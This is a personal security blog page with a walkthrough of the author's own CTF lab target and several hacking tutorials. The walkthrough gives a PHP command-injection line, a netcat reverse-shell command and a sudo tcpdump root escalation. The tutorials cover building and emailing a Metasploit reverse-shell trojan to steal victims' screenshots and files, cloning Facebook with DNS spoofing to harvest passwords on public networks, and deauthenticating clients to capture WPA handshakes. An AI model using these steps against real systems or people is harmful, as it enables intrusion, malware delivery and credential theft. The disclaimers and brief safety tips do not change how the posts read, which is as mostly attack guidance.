| MENU |

Steve’s Blog

ICA Indonesia(Bali 2015) CTF Walk-trough

Hello People,
Its been a while I’ve updated my blog, this blog write up is for the recent ICA Event ( Indonesian Cyber Army ) that held on 1st and 2nd October 2015 in Bali, Indonesia.
I got to admit something, Bali is so Good…. nice people, nice food, nice beach , nice clubs and many more nice things…..
I miss Bali…. ¬†ūüôā

This is a walk-through for CTF Competition. Let dig in:

Firstly you need to understand the Design of the CTF, as per the picture below:
ctf_hacking

As you can see the diagram, each team have 3 members, and there is Pitboss System named Master and a Live telecast on the projector showing the results.
Each team have to run a specially designed Virtual Image called “THOST” ¬†a.k.a Target Host , this Target Host is a Customized RHEL 6.4 with some vulnerability, On the day of the event,
each team been given a copy of THOST.

To run the THOST, there is some requirement:
1) THOST is a VMware Workstation Image, therefore, you required to have Vmware Workstation.
2) THOST require a Password to start and a CODE to configure.
3) THOST required active Network connection to Master System.
4) THOST is not available for Download, its been given to each team participated in ICA CTF Bali 2015.

Some of the participants asked me to give them the master system, I’m truly sorry, I can’t do that, and actually, you don’t really need the master system to run for practice.

To Perform a self practice, firstly, make sure you meet the requirements:
1) An x86_64 class Laptop/Desktop. ( Macbook also accepted  )
2) Windows 7 or Windows 8 64bit. ( OSX Mavericks and Above )
3) Install latest VMWare Workstation  ( Vmware Fusion for Mac )
4) Minimum 4GB RAM.
5) Enough space for 2 VM [ Kali Linux and THOST ( less then 5GB)  ]

Then, Configure your 1st Image :
1) Create KALI Linux ( 2.0 ) Image in Vmware
2) Setup the Networking for Kali as Bridged in Vmware
3) Set IP address as 192.168.0.250/23 [ 255.255.254.0 ]
*** you came for a hacking competition, therefore, you should know how to setup Kali Linux.
*** if you don’t, you don’t deserve to be here ( seriously )

Kali-Network-setup

Next, Configure THOST :
1) Copy the THOST image from the DVD to your system
2) Start the THOST Image from VMware Application
3) The password to start the image is ¬†“ica2015”

Steps to configure the THOST:
1) Once the THOST is started, you will be presented with Enter ICA Code
Thost-CODE
[Enter your assigned ICA Code ]
** The ICA code will set the IP address in the THOST.
** therefore, if your ICA Code is A22 , then your IP address would be 192.168.0.22/23(255.255.254.0)
** The A followed by a number is the code, the number represents your IP address for the THOST
** Make sure the NIC for THOST image is bridged, THOST will fail to start if it cannot ping 192.168.0.250 (Kali)

2) After the code is entered, you will get this output, there will be 7 flag created in this THOST, this flags are unique for each TEAM
Thost-Flag
[ 7 flag file and Random Admin Password for login ]

3) Then, immediately, you will get a prompt to restart,
Thost-Flag-restart
[ Press K to restart the THOST system ]

4) Once the THOST restarts, it will prompt you to continue,
Thost-Flag-restart-Continue
[ Enter C to continue boot ]

5) The THOST will self configure the IP address and Prepare all the vulnerability and will perform connection to IP 192.168.0.250/23
***it very critical for IP 192.168.0.250/23 to be in the network. ( in practice, the KALI Linux image has the IP 192.168.0.250 )
Once the configuration is done, you will get this out put.
Thost-Flag-restart-login
[ Write down the Admin user name and password somewhere, as this is the only login allowed to login to THOST, press K to login ]

6)Login to the THOST with the username admin and the password it gave you.
*** root user account password is 16 char, randomly generated, therefore, even me have no idea, what is the root password.
*** Once you login, verify the IP address and make sure you can ping 192.168.0.250 and from Kali Linux, make sure you can Ping the THOST.
Thost-login-verify
[ verify IP address and ping Kali Linux ]

For the rest of the walk through, we will assume
KALI LINUX IP = 192.168.0.250/23
THOST IP = 192.168.0.22/23 {ICA Code : A22}

—end of THOST config —-

If you manage to come up to this level, you are good to go to next level.
Next, we will dive into the Flags.

The main Objective of this ICA CTF is to capture the flags inside the THOST and upload to the flag server; |
the more flags you capture from more enemy, you will earn more points.
Since this is a practice, you are not required to upload the flag to flag server.
You just need to know how this flags can be captured.

Lets walk-through, The topics :

A) The scanning and ports open.
B) Vulnerability 1 [ user1 , user2 & user3 ]
C) Vulnerability 2 [ user cadlock and apache ]
D) Vulnerability 3 [user root escalation using sudo ]
E) Exploit to escalate to root [ upload exploit to root the system ]

A) The scanning and ports open

From your kali linux, you should perform a nmap to scan and see what are the Interesting Ports open
a nmap result would be like this:
nmap-scaning
[ nmap scan result ]

The result is very obvious , that very interesting TCP ports are open,
port  21 , 22 , 80 , 111  and 5666 is open.
As you should already know that port 21 is a FTP port, and 22 is ssh and 80 is Web,
so, as a hacker, you need to see what is interesting in this services.
recommended, you login to each services and perform a full reckon on what is available in each service.

B) Vulnerability 1

The first vulnerability is the FTP server, inside the FTP server, there is 20 files that been encoded, the clue is in the README file.
all you have to do is, download all the files from the FTP Server and decode and decrypt the files to reveal passwords and login information.
ftp_readme
[ a simple ftp to THOST will reveal the README file and the clue is there ]

Next, use ftp command to download all the files into your Kali Linux
ftp_download
[ login as anonymous and download all .txt files ]

To decode the files, run
decode-txt
[
 use md5sum to see which files are different, then run base64 -d ]

Once you get user1 password, you can login to THOST as user1 and capture the flag1 , as a hacker, you should see what else is open for access as user1 , if you look carefully, the directory
/home/apache have read access for others, therefore a bonus flag can be captured in /home/apache
flag1-flag6
[ ssh to THOST as user1 and get the flag1 and flag6 of apache user ]

Following up is, access to THOST as user2 and user3, user2 and user3 password are in the same file as the user1, but it been encrypted with AES 256 CBC and the password for user2 file been revealed in user1 decoded file, all you have to do next is, run

user2-pass
[ this reveals user2 password and encryption password for user3 ]

Next do the same for file number 3 to reveal user3 password
user3-pass
[
 this reveals user3 password ]

Now you have user2 and user3 password to access the THOST
In summary, the README file resides in the FTP server, clearly states the status of all files…
1) all files are encoded  ( means: all files are encoded in base64 )
2) some files are encrypted and encoded ( means, there is 2 files encrypted with aes-256-cbc and then been encoded with base64 )
3) find the encoding and decode to reveal the clue
4) the clue will reveal the password to decrypt the enncrypted files
note**  all encryption standard are AES 256 CBC ( this means all encryption standard is AES-256-CBC, you should know that this standard will encrypt and encode with base64 )

So, the 2 files are double encoded.
Next, once you get the user2 and user3 password, you can login to THOST and get the flag2 and flag3.

The second vulnerability,

C) Vulnerability 2

Pretty much, with user1, user2 and user3, you already can get flag1 , flag2 , flag3, if you dig further, you can also get  flag5( cadlock )  and flag6 (apache ).
with user1, user2 and user3, you can access apache home directory and the web system directory , /var/www/html/ , the login.php is hard-coded with cadlock user password.
cadlock_web1   cadlock_web2  cadlock_web3
[ the 3 diagram shows, how you can get cadlock username and password to capture flag5 ]

Now, if you did not manage to get user1 , user2 or user3 passwords from the clue, there is 2nd vulnerability  in the web site running in THOST, the Cadlock Intranet Backup System.
You can get at least 2 flags from this method, flag5(cadlock)  and  flag6(apache).

The tools you should use is dirbuster to see what are the directory available in the website and attempt to bypass authentication to gain entry to that directory.
dir_buster1
[ Run dirbuster against the THOST website to reveal what are the directory available ]

dir_buster2
[ After scan, you will notice there is a directory called  logs and there is log_mon.php ]

Attempt to access http://<thost ip>/logs/log_mon.php
cad_lock_port_udp1000
[ this is the page for log_mon.php, you access without authentication ]

If you read carefully, a clue been given here, that is, port UDP 1000 is receiving data and its written directly to this page.
As a hacker, you should see the opportunity here, you can post arbitrary php code to port UDP 1000 using netcat and attempt to execute that page with your code, solution :

net_cat1    net_cat2

As you can see the POC of typing text in netcat port 1000, gets into the page directly.
using this method, you can run a netcat session in Kali Linux and get THOST to spawn a shell for you. Solution :

Steps :
net_cat3 net_cat4 net_cat5  net_cat7  net_cat8  net_cat9 net_cat10 net_cat11

In summary : all you have to do is:

1) Once in netcat : run ( netcat THOST-IP -p 1000 ) and run this to insert the PHP code to the log_mon.php page
<?php echo exec($_GET[“cmd”]); ?>

2) Start a local netcat in KALI linux
nc -lvvp 1234

3) run in address
http://THOST/logs/log_mon.php?cmd=mknod /var/tmp/backpipe1 p

4)run in address
http://THOST/logs/log_mon.php?cmd=/bin/sh 0</var/tmp/backpipe7 | nc KALI-IP 1234 1>/var/tmp/backpipe1

5)run in the local netcat session : to spawn a SHELL
python -c ‘import pty; pty.spawn(“/bin/sh”)’

and there will a shell access to THOST as user apache…. ¬†ūüôā
You can cat the login.php file in /var/www/html/ to reveal cadlock password.

Moving on.

D) Vulnerability 3
This one is a bit tricky, but as a hacker, you should always think, once you gain entry to a system, what else you can do or find…
In that context, the flaw 3, is under user cadlock, if you login to THOST as user cadlock, you can run sudo -l , it will reveal that user cadlock been granted access to run tcpdump using sudo,
it may look totally legitimate command to run by user cadlock, but, there is a flaw in tcpdump command in Linux, go through the diagrams to see what would happen when you run tcpdump using some smart flags… ¬†ūüôā

 

tcp_1 tcp_2

The steps is very straight forward:

1) echo $’echo pass | passwd root –stdin’ > /var/tmp/.runme ¬†( will create a file in /var/tmp/ with the command to reset root password )
2) chmod +x /var/tmp/.runme ( make the file executable )
3) sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /var/tmp/.runme -Z root  ( read man tcpdump to get the meaning of all the flags )

***THOST system will prevent writing to /tmp , therefore, you can write to /var/tmp
*** running tcpdump with that options, will invoke the runme file, where it will reset root password to pass
*** and you can reset  root with password pass to gain flag7(root) and flag4(admin)

E) Exploit to escalate to root

Finally, exploit ….. this is hard, one should master the C coding, assembly language, debuggers , Assemble Machine Language analysis. I seriously never hope any team to do this, but congratulations to Team from University of Indonesia to attempt the exploit. But… it failed… ūüôā

Well, let me give an introduction on the exploit.

Exploit is a program that performs insertion of shellcode to memory that has some kind of bug, in this case RHEL 6.4 have a perf_event bug that documented in cve-2013-2094 , semtex.c.
The exploit semtex.c will open root shell and escalate to root from regular user. The mitigation step is to prevent perf_event handler in Kernel to run as a regular user, the THOST system is enabled with this workaround. Therefore , running the exploit from public source will be prevented.

Steps to download and run :
semtex_1  semtex_2

As you can see, running semtex.c failed, because the THOST system have prevented the perf_event handler in Kernel, the flag kernel.perf_event_paranoid=2 will prevent semtex.c exploit to run. This is a work around published in the CVE-2013-2094
semtex_3

But, the internet is a BIG Ocean, instead of using a publicly available exploit, you should get in touch with some underground exploit. Where, the publicly available exploit would be heavily modified to bypass any work around.

As a proof of concept, you may view the picture below:

sem3_1
[ the file semv3.tgz have the modified version of semtex.c ]

sem3_2
[
 as you can see, the /etc/sysctl.conf still have kernel.perf_event_paranoid=2 enabled, but the modified version of semtex.c can escalate to root ]

*** to protect the original author of the modified version of semtex exploit, i cannot upload the semv3.tgz anywhere, but, if you work hard in the internet, you could find it from some site.

So… we are in the end, thank you for your interest in the CTF, hopefully, you understand the steps and all the vulnerability, this vulnerabilities are created by me, therefore, its not something you can find in the wild, its purely for ICA CTF Hacking event in Bali.

You may email me if you have any questions but under this condition:
1) I cannot give you the semv3.tgz file, don’t ask
2) I cannot teach you hacking, you have to teach yourself
3) There is no book, or referral for hacking, all they have is purely for education purposes.
4) I can be invited to do a Talk for your campus, if Accommodation and Travel expenses is covered ( Only for Indonesia ) 
5) I am NOT a hacker, I’m doing R&D for ¬†FOResec ( Research and Development )

Thank You very Much. Until we meet again, “Good Hunting”
Special shout out for all the team members from STIKOM Bali to make this event a memorable for me.

you wanna be a h@ck3r? then learn coding, coding in C, else you are considered a script kiddie” ¬†– ¬†$73v^en

Metasploit Framework – Hacking 101

Hello People,
Been long time, i never update anything, finally, a free day in my life…. I’ve compiled a hacking tutorial for beginners to learn and understand, ¬†about Metasploit Framework and what and why and how to use it.
The scenario would be, using a Linux Kali system with Metasploit, we create a file and send to a Windows machine and make the user to execute it, and when the user execute the file, a connection would open to Linux Kali, beyond that, we can control, steal and pretty much do anything to Victim Computer.

The scenario calls for a situation where, a file that created is a kind of a “Trojan virus”, and we send the trojan to victim machine, the challenge is, to send the file and make the file bypass the default security settings in a Victim computer.

Firstly, Prepare your environments, things you need :

1. Virtual Machine [ one Kali Linux VM & one more Windows 8(Victim) VM ]
2. Knowledge [ TCP , IP , some basic command Line knowledge in Windows and Linux ]

The Topics :

A. What is Metasploit Framework  & How to Use it
B. What is Payload  and How to Create it
C. How to Transfer or get the payload delivered to Victim
D. Exploit! and the Fun Begins !!
E. Things you can do once Exploit is Successful

Lets begin, 

A. What is Metasploit Framework  & How to Use it?

Metasploit, is a Framework to perform penetration testing towards a Computer, the Framework contains all the latest known vulnerabilities in Software and Hardware that available in the Market, from Windows , Unix to Cisco Router … etc.., therefore, using the framework, One can exploit the known vulnerabilities of a System. Obviously, the usage of this framework is to learn and patch known holes in the systems.

How to use Metasploit? The Framework is downloadable and Configurable in any Linux / Unix environment, but, to make life easier, its already included in Linux Kali, you just need to start it to use it.

Start you Linux Kali and set the basic network settings, then Start the metasploit framework.
get-ip-in-kali run-msfconsole

 

Once the msfconsole is up and running, then we need to create the Payload!,

B. What is Payload  and How to Create it ?

A payload is term used in Metasploit Framework to describe a specially crafted file that contains malicious code that has ability to perform backdoor connection. Commonly, a reverse connection back to the hacker computer. Most Anti virus would detect this, but as technology evolves, only the best anti virus & anti malware has the ability to read the file’s pattern and detect it as a virus or malicious file that would harm the computer.¬†
Creating a Payload in Metasploit Framework is very easy, ¬†there’s many payload available in this framework, for simplicity purpose, I’ve used the most easiest payload, lets see, on how to create it,¬†

Firstly, you need to run these commands, These commands will make the framework to load the particular payload
use-payload-reverse_tcp

Once the payload loaded onto the framework, we need to plumb in some information about our Linux Kali and then, we create the payload file. 
generate-Payload

C. How to Transfer or get the payload delivered to Victim? 

Once the payload file created, I’ve named it “runme.exe”, the next step is, we need to create a webserver and put the payload file in the web server, and send a trick/spam email to victim advising him to download and run the file.¬†
[ For the purpose of simplicity, I just created a simple FAKE website and simple FAKE email to do this, you can be creative, create a super FAKE page and a SUPER fake EMAIL to convince the victim, remember!, the success of this hacking is all about getting the victim  to download the file and execute it ] 
You can follow the steps below for a simple POC web server and a simple Fake email with links. You just need to copy the payload File called “runme.exe” to the web directory and create a index.html file with appropriate html syntax and start the Web Server.¬†
prepare-Webserver 

Once, the web server started, you can now, go ahead and browse the site via ip address and verify the payload file is downloadable, if its good, go ahead and create an email to the victim with links pointing to the Payload files and send to the victim. 

send-email-link

After the email is sent, the next step would be, to create a handler to handle the incoming connection from our payload file. 

D. Exploit! and the Fun Begins !!

Exploit! , well, based on the payload you use, you can hit directly to a victim computer or create handler exploit to handle incoming connection from the payload execution. In our case, we are not hitting directly, because, hitting directly is solely based on what software is running in Victim computer and the count of vulnerabilities exist in that software. What we about to do next is, to create a handler exploit, which, the framework would create a server process and start listening to connection from the payload file. A¬†handler is to handle the incoming connection upon successful execution of the payload file in the victim computer, Once the Victim executes the payload files, the handler will send a staged file to the victim computer , and this is what we call “Exploit” ¬†for that, the following commands would create a handler , and will start a server service.¬†

Start-Handler

Done! you may congratulate yourself! , The Payload created and sent to victim, and Handler exploit is running in our Linux Kali, next, we shall WAIT for the victim to execute the file. 

Since, we sent the payload via a link through email, and the victim’s computer is a Windows 8, the victim would see an email and links as follows,
login_screen  Win8ent  fake_email_with-link  Click_Run_the_Payload 

The last snap, is where the Victim downloads the file and executes the file, in a not well maintained Windows system, the file can be downloaded without any problem. 

When the victim, executes the file, nothing will happen, the victim would NOT sense anything, it would not disrupt anything the victim is doing, but in the background, what really happens is, the payload file ( runme.exe ) have created a connection back to our Linux Kali system, and our handler exploit ( Server Process ) will exploit the victim’s computer by sending a stage file to the victim computer, as you can see, a hole is created between the Linux Kali(attacker) and Windows 8(Victim) the following output is expected in Linux Kali system
Session-Started

and, we Own3d the Windows 8 (victim), during the sending of stage file, the victim could not sense anything, his/her computer would behave ¬†normal and since we crafted the payload using “Shikata Ga Nai” encoder, even the built in anti malware in Windows 8 could not sense it,¬†¬†the following step, is what can we do to the victim, there are many commands can be executed, many thing can be done, I’ve highlighted, 2 fun things you can do,¬†

E. Things you can do once Exploit is Successful

Lets say, the victim is browsing and logging into some website, or practically doing anything in his/her computer, we can snapshot the screen and save it in Linux Kali system, as follows, 

Victim is Broswing casually, Logging into some sensitive websites that reveals information for his/hers  eyes only, 
victim_broswing_casually

On the Linux Kali, in the framework, we can run this command and save the snapshot of the victim’s computer,
run_screenshot the_victim_screen 

That’s a cool thing to do! don’t you think so? [ Evil Laugh ]¬†

Apart of the screenshot, we could also steal the victim’s data! Let’s say, the victim have some data/files ¬†in his/her computer, because we have a session connected via our payload, we have the ability to browse and download the files.¬†

Steal_1 Steal_2 

And that’s metasploit framework in action, simple and ready to use. As you can see, the entire demo in this blog is for learning and POC only, one can misuse the information doing ¬†illegal activity, One can do this very creatively in any open Network, its not¬†necessary to send the links via email,one can perform network¬†poisoning to redirect the victim to download the file and one can create a webpage that¬†auto downloads the¬†payload file… or perform buffer overflow using known vulnerabilities in the victim computer,…..anything is possible…. ¬†so, ¬†to save guard your system,¬†follow this steps:

1. NEVER download files or Click any unknown links you find in internet, email or files. 
2. Encrypt your DATA at all time.
3. Update / Install Patch to your system 
4. Have a counter protective softwares such as Anti Virus, Firewall and Anti Malware 
5. Be vigilant and Attend training for more information on how to be safe in cyberspace. 

By Following the steps highlighted above, you can rest assure, your computing would be safe….¬†

Thank You very much for reading and supporting my blog. Do let me know, if you need more information, if I’m free, I’m willing to help, or buy me beer, that¬†would really encourage me to really HELP you…. hehehe….So long people, till’ we meet again in another blog post. Stay Safe, Stay Vigilant!¬†

*all this DEMO was done in a Controlled environment, no DOGS or CATS were harmed during  the production of this DEMO. 
*all EMAIL, COMPUTER AND WINDOWS account used in the DEMO is with 100% permission from the owner[s]. ( That is ME ) 
*Use all the information with your own risk, www.steven.com.my do not condone this demo to be used in real public environment or for any illegal activity. 

 

 

Facebook Password Hack

Hello People…… this going to be about how to get Facebook password via setting up a fake login¬†environment for the victim to login and we able to harvest the username and password without any indication to the Facebook owner….

Facebook is a popular social site… a lot of people use it on daily basis, what they are not¬†aware is, its hackable…, most people think its¬†just a social site, hence, its not so important to secure it, so, they ignore…. logging into Facebook account in public network may give away your credentials and your informations… [ This really happened to me several years ago, someone got my page and posted that i’m dead! my phone rang non stop on that day… sigh ]¬†

In my training days, ¬†my students would login¬†Facebook on the training pc and start checking the update status while the training is going on, well its not a big problem, it¬†doesn’t really¬†distract¬†them, but, they just keep an eye on the status updates and another eye on me.. :)….and I would warn them, that¬†logging in using public computers is dangerous…. but… well, ¬†they don’t really care much.

So, I decided ¬†to reveal the¬†easiest method to catch the username and password in a public¬†environment. e.g Starbucks, Training Rooms, Hotels, Train Stations , Airports…. and so on….
With this information, I hope, people will be more vigilant before logging into Facebook from a public network. 

UPDATE!!! :: this method called MiTM ( Man in the Middle Attack ) means, you need to be in the middle of the victim and the Internet! 

Lets Begin: 

I’ve designed a structure to understand the steps involved.¬†

  1. Requirements
  2. Setup
  3. Configure SET Tool kit [ Social-Engineer Toolkit ]
  4. Configure DNS Spoofing
  5. Results

1. Requirements:

Before you begin to run this and test it on your own environment, make sure this requirements are met,

  1. A Laptop : 4GB Ram and above
  2. VMware Workstation / VMware Fusion   [ www.vmware.com ]
  3. A Switched Network ( LAN or WLAN )  [ http://en.wikipedia.org/wiki/Fully_switched_network ]
  4. Kali Linux   [ www.kali.org ]
  5. Network Protocol Knowledge : e.g IP , TCP , HTTP &  HTTPS    [ http://en.wikipedia.org/wiki/Lists_of_network_protocols ]
  6. Linux Command Knowledge [ http://www.tldp.org/LDP/intro-linux/html/ ]

2. Setup:

Setup your VM to boot Kali Linux  [ I assume you know how to setup  a Virtual Machine, if not head to this site  and learn]  then, get connected to your target network , make sure you are in the Network by performing a casual browsing. Once you are set in the target network, boot your Kali Linux VM and get the VM to be connected to the target network as well.

Then run these commands to find your IP address and the Gateway.
Debian_7-Kali

3. Configure SET Tool kit [ Social-Engineer Toolkit ]

Once you got your IP address, you need to start SET tool in Kali Linux, just run ” setoolkit ” from your terminal, SET is a tool that included inside Kali Linux to perform massive Hacking Attack, there’s a tool within that can create a fake page of www.facebook.com and it will setup a web server to run inside your computer and act as the www.facebook.com itself…. and all this is done automatically…. cool huh?¬†

Lets take a look at the steps to create a fake Facebook page…

setoolkit

After that, select 2 followed by 3 ….
select 2  select 3

Once you in that Menu, enter your IP address and https://www.facebook.com to the prompt to setup a clone Facebook Website running inside your Kali Linux as a Fake Facebook Page.
Debian_7-Kali 5

Once the SET tool started the fake Facebook login, Now Leave that window alone and move to next step… [ You may want to browse to your OWN ip address to verify the fake website is up and running ]

4. Setup DNS Spoofing

DNS Spoofing, is an old type attack that exist very very long time ago…. what actually they do is, an attacker will forge entry of a specific DNS host ( in our case, its www.facebook.com ) ¬†and poison the network with that forged entry, any victim that query for www.facebook.com, will be given with a ¬†fake DNS record/answer that eventually pointing to our fake Facebook page….

So, lets take a look at the setup.

Firstly, open a new Terminal and  you need to edit this file and setup accordingly,
Debian_7-Kali 2

Then, you need to run these command to poison the whole network [ Be very careful when doing this, the whole network will be poisoned, therefore not recommended to run in a large network ]. As a part of technical view, I’ve included the before and after effects from 2 most used client computers, a MAC and Windows.

Before Performing Poisoning , MAC and Windows : Both computer able to ping the real www.facebook.com, 
b4-dns-spoof-MAC b4-dnsspoof-win

Now RUN the Command to Poison the whole network with forged DNS record of www.facebook.com
Debian_7-Kali 3

 The After Effects of running the DNS Spoof a.k.a Poisoning : Both Computers now thinks our Kali Linux IP address is www.facebook.com
Af-dns-spoof-MAC Af-dnsspoof-win

Now your whole network would be poisoned with your fake DNS record…, by now if anyone is trying to access www.facebook.com, it will land on your fake FB page… the results? Next…

5. Results

This is the result of logging in Facebook via the fake Facebook login…

–THE FAKE PAGE Looks like this on the victim computer [ Windows: IE and MAC:Firefox ] :
firefox-fake-login2  ie-fake-login

I’ve tried with my own account and my friend’s account [ off course, its with her 100% permission ūüôā ¬†]

–THE Username and PASSWORD collection in SET inside KALI Linux¬†
steve-pass-captured zhall-pass-captured
Obviously, I’m not going to reveal the password… yeah? ūüôā¬†

 

–The Victim PAGE looks like this…. no Trace , no Error, no indication of this is happening? Cool huh?
firefox-fake-login3 ie-fake-login2

So… That’s the FACEBOOK password hack…. it can work with bank’s website as well, but, that’s the reason banks have dual login method, first they give you the Username prompt and then they give you the password prompt …. so, its still safe…. ūüôā¬†

All I would suggest is, be vigilant, and DO NOT login to WEBSITES that has your information in PUBLIC network, so, the next time you visit Starbucks, just drink coffee and socialise with a human instead with Facebook! Okay? Have Fun !!! 

and there’s one more thing, you need to setup CA Server,¬†Certificate¬†Signing and Configure some Certificate settings and proxy redirect before this can be done…if not, the victim would know its a fake page, that would be a long tutorial to¬†write¬†here, so, if you are interested, Attend training, read wiki’s, google it , bing it..or buy me beer…¬†you can get the¬†detailed¬†info… ūüôā¬†

*all this DEMO was done in a Controlled environment, no DOGS or CATS were harmed during  the production of this DEMO. 
*all FACEBOOK account used in the DEMO is with 100% permission from the owner[s]. 
*Use all the information with your own risk, www.steven.com.my do not condone this demo to be used in real public environment.

WPA/WPA2 Crack Demo – Live – Part 1

Yeah yeah…its an old topic…but something interesting….WPA/WPA2 Cracking……using Dictionary Brute Force and Brute Force using GPU and CPU. There’s many info about this outside there,¬†unfortunately,¬†there no single Straight Forward or Real GUIDE to reproduce those DEMO, so I’ve decided to relay this¬†clearly… yeah… CLEARLY! and straight to the POINT! ¬†( hopefully it would benefit some )¬†

A brief Intro: 
Wireless is currently used as part of our home/business/entertainment internet infrastructure, hence, security and securing the infrastructure is very Important, unless, you don’t mind your neighbour using your bandwidth to Download and Upload or even eavesdropping on your traffic, then, LEAVE this BLOG NOW!… ¬†or if YOU want to secure your infrastructure, take a look at the Possibilites and work towards Secure Wireless… we called this “ Security Through Scrutiny

I’ve put in some structure to this GUIDE:

 

  • PART 1¬†
    1. The Understandings 
    2. The requirements
    3. The Gathering 
  • PART 2
    1. The Cracking 

So, lets begin the PART 1, 

1. The Understanding

  1. Wireless: The traveling of data in an unseen world, as water, that has no taste, no flavour, no colour, but we need it everyday, Wireless works with AIR.. or space… or whatever you would name it, as technology evolve, we need it everyday… same like Water…
  2. Data Travelling in Air, requires frequency, like our radio, therefore its requires Radio Frequency and a Channel.
  3.  Wireless technology or known as WiFi has a predefined  Channel and Frequency that created and controlled by IEEE
  4. Each Wireless infrastructure requires an AP ( Access Point ) and Wireless Client ( Laptop, SmartPhone, Tablets  and etc )
  5. To Protect the Data Exchange between Wireless AP and Client, a Security Mechanism/Protocol is created, Known as WEP , WPA , WPA2-Personal and WPA2-Enterprise
  6. Commonly used Wireless Security Protocol today in our everyday life is WPA-Personal for Home/Small Businesses and WPA-Enterprise for Enterprises.
  7. WPA/WPA2 requires min 8 Char as the shared code ( Shared Code is like a password to Access the Wireless Service ), each client required to insert the passcode in order to join a wireless access point.
  8. Each Wireless Access Point broadcast a name known as BSSID ( or SSID )
  9. A little understanding of Linux operating system and the way to use the command
  10. A little understanding of Virtualization Technology and How to Setup a Virtual Machines

And that the understanding. Please refer to all this links to get more Information about the UNDERSTANDING:
( You really need to UNDERSTAND this part, and by just reading these links, you may not Understand, that’s why we have Hand’s On Lab, Books, Trainers, Security/Wireless Certified Guys… and so on, try to use them as well… ¬†)

  1. http://en.wikipedia.org/wiki/IEEE_802.11
  2. http://en.wikipedia.org/wiki/Wireless_security
  3. http://en.wikipedia.org/wiki/List_of_WLAN_channel
  4. http://www.tldp.org/LDP/intro-linux/html/
  5. http://en.wikipedia.org/wiki/Comparison_of_platform_virtualization_software


2. The Requirements

A. Hardware:

    • A Laptop with at least 4GB RAM or more
    • A Wireless Card that supports “Packet Injection” (usb)
    • USB Port

The WIRELESS Card i used for this DEMO : 

alfa1     image-2
Add to the Wireless card, a good powerful antenna would be an added advantage…

B. Software:

    • Any O.S that is capable of running Linux as Virtual Machines
    • VMWare Workstation [ Windows ] or VMWare Fusion [ recommended to reproduce the DEMO ] ¬† —> http://vmware.com
    • Kali Linux 64bit latest release ¬† ¬†—> ¬†http://www.kali.org

3. The Gathering

Well, if you are still reading this, then, I assume, you do know what is virtualisation and how to setup and etc…, so, we take a straight deep dive to the Gathering Part inside kali linux, if you still stuck in setting up, drop a comment, if i’m free, I’ll help.

 

Firstly, start the KALI Linux VM, then attach the USB wireless device and make sure the Kali Linux detect it…. run this following commands to verify the setup…
Debian_7-Kali

if the card is detected, then, run check to see is there any process that can cause trouble, if there is, kill it!
Debian_7-Kali 2

Then, Next would be, Check again and Start the wireless card in monitor mode
Debian_7-Kali 3

Then, perform a Air Dump, means DUMP all available DATA travelling in the air to your console….
Debian_7-Kali 4 

The result of the dump should look like this, from there, pick you target and write down the  target information, e.g : BSSID & Channel 
Debian_7-Kali 5

Then, stop the AIR DUMP and Start over again the dump, but this time using the Target information and set the command to Collect the DATA in a text files defined by option  [ -w ] 
Debian_7-Kali 6

Following, while its collecting DATA from the DUMP, proceed to next step, 
Debian_7-Kali 7

Next, start a new console and perform DoS [ ¬†Denial of Service ] to force all the client connected to perform a reconnection, when the reconnection happens, a WPA HANDSHAKE will take place, the whole gathering is depends on the WPA HANDSHAKE… follow this….¬†
Debian_7-Kali 8

and then, go back to view the gathering of WPA HANDSHAKE, 
Debian_7-Kali 9

If you see the WPA HANDSHAKE, you may stop all you activity and proceed to part 2….. Well… based on the comments and likes I get in this¬†article, I would¬†construct the part 2, in Part 2, I will DEMO on how to Crack the HANDSHAKE using Dictionary, GPU and CPU… See you guys in next round…. Have Fun “Gathering”¬†

*all this DEMO was done in a Controlled environment, no DOGS or CATS were harmed during  the production of this DEMO. 
*all the  gathered NETWORK belongs to Steven.Com.My,  WE do NOT crack others NETWORK,  unless we have a Written permission to do so. 

Learning PHP / CSS / HTML

Well, I’m a technical trainer, but never a programmer, actual fact is, I learned programming & my major was Programming, gone the days where I compile c programming in my head… well, to maintain that I still do shell programming…. via unix/Linux… interesting, but requires depth understanding of admin commands before you can shell script… now, I’m learning more & more about php/CSS/HTML… and every time is see the code snippets … I get a my head spinning at 10000 rpm… but… hey, it’s a good thing & nice to learn new things… for the beginners, I strongly encourage you guys to browse these links….. example, setting up php… and so on…

W3school

easy php

php net

… more to come… chillax

posting from Iphone…

it’s does work! sweet! but lack of editor WYSIWYG…. ūüôĀ no best free editor… gotta stick with the default one…. Continue Reading

Never a web blogger

Hello world, again…… That reminds me of my first programming….. Hello world…. Lolz. Well, actually am not a big time blogger, don’t really know what to blog about, well, now am trying to be more a blogger… Trying to contribute something to the internet world…. Hopefully it’s comes by good…. Wish me luck people! ūüôā

My Tech…

My Tech Systems…. its getting older… but, still performing…

 

 

Finally a Better Editor…

After searching and researching, I found a good editor. its cool, and good, its called TinyMCE, i remembered I used something like that in Joomla… Oh Joomla… too much security bugs…. any way…. lets try some of it….¬†

Still, the Image insert require you to type in the complete URL…. sigh… More research…. ūüôĀ

Pages:12